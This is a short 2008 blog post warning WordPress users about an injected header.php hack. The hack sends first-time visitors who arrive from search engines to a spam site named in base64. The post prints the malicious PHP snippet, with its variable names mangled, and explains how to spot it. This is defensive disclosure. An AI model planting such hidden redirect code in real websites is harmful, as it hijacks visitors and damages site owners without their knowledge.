Featured Posts

$200 Adcenter Voucher I was browsing some books on marketing at Barnes & Noble today when I noticed one titled "Search Engine Advertising: Buying Your Way to the Top".  I picked it up and...

Readmore

WordPress Redirect h4x’s

Posted by Dan | Posted in Main | Posted on 09-06-2008

0

Lately I have noticed some peoples blogs had been redirecting to some spammy landing page when you goto them from Google. I notified them about it and they thought I was nuts… cause they could not reproduce it.

Donncha (wish your girlfriend was hot like me(sorry)) O Caoimh well known wordpress developer has made a great post about how sites are hacked and also what to look for.

Donncha also has pinpointed the redirect and cookie hack which is very difficult to detect but what I have suspected has been going on:

PHP:

  1. &lt?php =array(“google”,“msn″,“live”,“altavista″,“ask”,“yahoo”,“aol”,“cnn”,“weather”,“alexa”);
  2.  
  3. =0; foreach( as ) if(strpos(strtolower(Array[‘HTTP_REFERER’]),)!==false){ =“1″; break; }
  4.  
  5. if(==“1″ && sizeof(Array)==0){ header(“Location: http://”.base64_decode(“YW55cmVzdWx0cy5uZXQ=”).“/”); exit; }?>

The code above basically redirects people from your website to their choice if:

1) they are coming from a search engine or other big referral site.
2) they have never visited your site before (no cookies are set).

Its pretty slick and very hard to detect since only NEW visitors would be effected.

Make sure you check all of your blogs for that code. (in header.php)

Share and Enjoy:
  • Digg
  • del.icio.us
  • Netvouz
  • DZone
  • ThisNext
  • MisterWong
  • Mixx
  • Propeller
  • StumbleUpon

Comments are closed.